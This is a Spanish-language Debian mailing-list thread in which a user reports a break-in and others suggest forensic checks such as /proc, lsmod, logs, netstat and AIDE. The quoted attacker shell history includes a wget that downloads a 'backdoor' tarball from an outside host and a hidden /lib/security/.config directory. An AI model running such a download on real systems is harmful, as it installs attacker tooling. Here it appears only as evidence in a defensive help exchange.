[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

RV: Fui atacado]

Buenas,

	Antes de nada saludos a la lista que es la primera vez que posteo. 

	A renglón seguido, puedes probar a mirar en /proc los números de
proceso. Los directorios que son numeros, son los identificadores de los
procesos que hay. Puedes acceder a ellos y con un simple cat ver datos sobre
ese proceso. 

	Además puedes comprobar si con lsmod observas algún módulo extraño.
Si lo ha hecho bien, que lo dudo, si ha troyanizado el sistema no aparecerá.
Pero igual suena la campana y lo pillas. 

	Observa los logs en /var/log para ver si puedes recabar más info
sobre el tipo que te ha entrado.

	Mira tambien que no haya en tu home otros históricos de otros
interpretes (que se suele hacer para dejar las menos huellas posibles).

	Con netstat -vaptn podrás observar (repito que siempre y cuando no
esté bien troyanizado el sistema) los procesos que escuchan cada puerto.

	Y como punto final, la próxima vez usa algo como Aide para hacer una
imagen del sistema intacta y comparar en caso de que creas que ha habido una
intrusión.

Un saludo a todos/as,

Iñaki R.

-----Mensaje original-----
De: SoTaNeZ [mailto:sotanez@telefonica.net] 
Enviado el: viernes, 20 de febrero de 2004 16:40
Para: debian-user-spanish@lists.debian.org
Asunto: Re: Fui atacado]

==> nada de fecha 18 de febrero en el syslog. Luego hice un history y me
==> aparecio esto que por su puesto yo no lo hice(màs raro aun):
==> 
==>  484  cat /etc/issue
==>   485  ps
==>   486  bash
==>   487  /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin
==>   488  netstat -a
==>   489  cd /lib/security/.config/bin
==>   490  cd /lib/security/.config
==>   491  dir
==>   492  cd ssh
==>   493  dir
==>   494  cd ..
==>   495  wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496
==>  /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
==>   497  wget
==>
http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2
.3.10-x86-linux.tar.gz
==>   498  wget geocities.com/s3rjiu/backdoor/ser.tar.gz
==> 
==> Esto paquete porsuesto no los baje.

Parece que se han colado en tu ordenador y se han bajado un backdoor de esos
(y no ha borrado el historial, animalito). Pues yo me iría para empezar a la
pagina de la que se ha bajado el backdoor, para ver que es lo que hace, y
conectate a internet lo menos posible, y pon un firewall que bloquee
practicamente todo menos lo necesario. Mira los servicios abiertos a
internet y el kernel, a ver que vulnerabilidades tienen. También te puedes
bajar el manual análisis forense en linux o algo así que esta en
es.tldp.org. Y si quieres una lista mejorcita pues apuntate a la lista
hackindex (busca en google la web).
==> 
==> Ah hago un ps y no sale nada, me dice esto:
==> Violación de segmento

Vaya, eso igual lo ha echo el troyano.
No soy ningún experto, asi que no puedo ayudar más, saludos.

==> Cual es la inseguridad que tengo?
==> 
==> Gracias y saludos......
==> 
==> -- 
==> Federico Contreras
==> T.S.U. en Informática
==> U.D.O.
==> 
-- 
"No hay nada peor que ser vulgar"
sotanez@jabber.cn


-- 
To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org
Reply to: